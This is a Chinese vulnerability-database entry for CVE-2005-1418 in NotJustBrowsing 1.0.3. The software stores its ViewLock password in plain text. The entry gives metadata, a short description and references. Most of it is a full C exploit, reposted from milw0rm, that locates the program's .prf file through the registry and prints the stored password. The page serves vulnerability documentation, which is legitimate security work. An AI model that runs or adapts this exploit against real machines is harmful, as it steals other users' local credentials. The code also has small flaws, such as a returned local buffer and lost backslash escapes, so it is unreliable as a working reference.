NotJustBrowsing本地信息泄露漏洞

NotJustBrowsing本地信息泄露漏洞

漏洞ID 1108726 漏洞类型 设计错误
发布时间 2005-04-28 更新时间 2005-10-20
图片[1]-NotJustBrowsing本地信息泄露漏洞-安全小百科CVE编号 CVE-2005-1418
图片[2]-NotJustBrowsing本地信息泄露漏洞-安全小百科CNNVD-ID CNNVD-200505-835
漏洞平台 Windows CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/966
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-835
|漏洞详情
NetLeafLimitedNotJustBrowsing1.0.3在notjustbrowsing.prf文件中以纯文本形式i存储ViewLock密码,本地用户可以借此获取权限。
|漏洞EXP
/*****************************************************************

NotJustBrowsing 1.0.3 Local Password Disclosure Exploit by Kozan

Application: NotJustBrowsing 1.0.3
Procuder: www.notjustbrowsing.com
Vulnerable Description: NotJustBrowsing 1.0.3 discloses passwords
to local users.

Discovered & Coded by Kozan
Credits to ATmaCA
www.netmagister.com - www.spyinstructors.com
[email protected]

*****************************************************************/

#include <stdio.h>
#include <windows.h>


HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;


char *bilgi_oku(int adres,int uzunluk)
{
	if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
					"SOFTWARE\Microsoft\Windows\CurrentVersion",
					0,
					KEY_QUERY_VALUE,
					&hKey
					) == ERROR_SUCCESS)
	{

	lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,(LPBYTE) prgfiles,
&dwBufLen);
	if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
	{
		RegCloseKey(hKey);
		return NULL;
	}
	RegCloseKey(hKey);

	strcat(prgfiles,"\NetLeaf Limited\NotJustBrowsing\notjustbrowsing.prf");

	int i;
	FILE *fp;
	char ch[100];
	if((fp=fopen(prgfiles,"rb")) == NULL)
	{
		return "NOTINSTALLED";
	}
	fseek(fp,adres,0);
	for(i=0;i<uzunluk;i++)
	ch[i]=getc(fp);
	ch[i]=NULL;
	fclose(fp);
	return ch;
	}
}

int main()
{
	printf("NotJustBrowsing 1.0.3 Local Password Disclosure Exploit by Kozann");
	printf("Credits to ATmaCAn");
	printf("www.netmagister.com - www.spyinstructors.comn");
	printf("[email protected]");
	if(bilgi_oku(4,3)==NULL)
	{
		printf("An error occured!n");
		return -1;
	}
	if(bilgi_oku(4,3)=="NOTINSTALLED")
	{
		printf("NotJustBrowsing 1.0.3 is not installed on your system!n");
		return -1;
	}
	printf("View Lock Password: %s",bilgi_oku(4,3));
	return 0;
}

// milw0rm.com [2005-04-28]
|参考资料

来源:XF
名称:notjustbrowsing-password-disclosure(20319)
链接:http://xforce.iss.net/xforce/xfdb/20319
来源:BID
名称:13442
链接:http://www.securityfocus.com/bid/13442
来源:OSVDB
名称:14687
链接:http://www.osvdb.org/14687
来源:SECTRACK
名称:1013826
链接:http://securitytracker.com/id?1013826
来源:SECUNIA
名称:15184
链接:http://secunia.com/advisories/15184

相关推荐: GuppY PrintFAQ.PHP Cross-Site Scripting Vulnerability

GuppY PrintFAQ.PHP Cross-Site Scripting Vulnerability 漏洞ID 1096029 漏洞类型 Input Validation Error 发布时间 2005-09-06 更新时间 2005-09-06 CVE…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享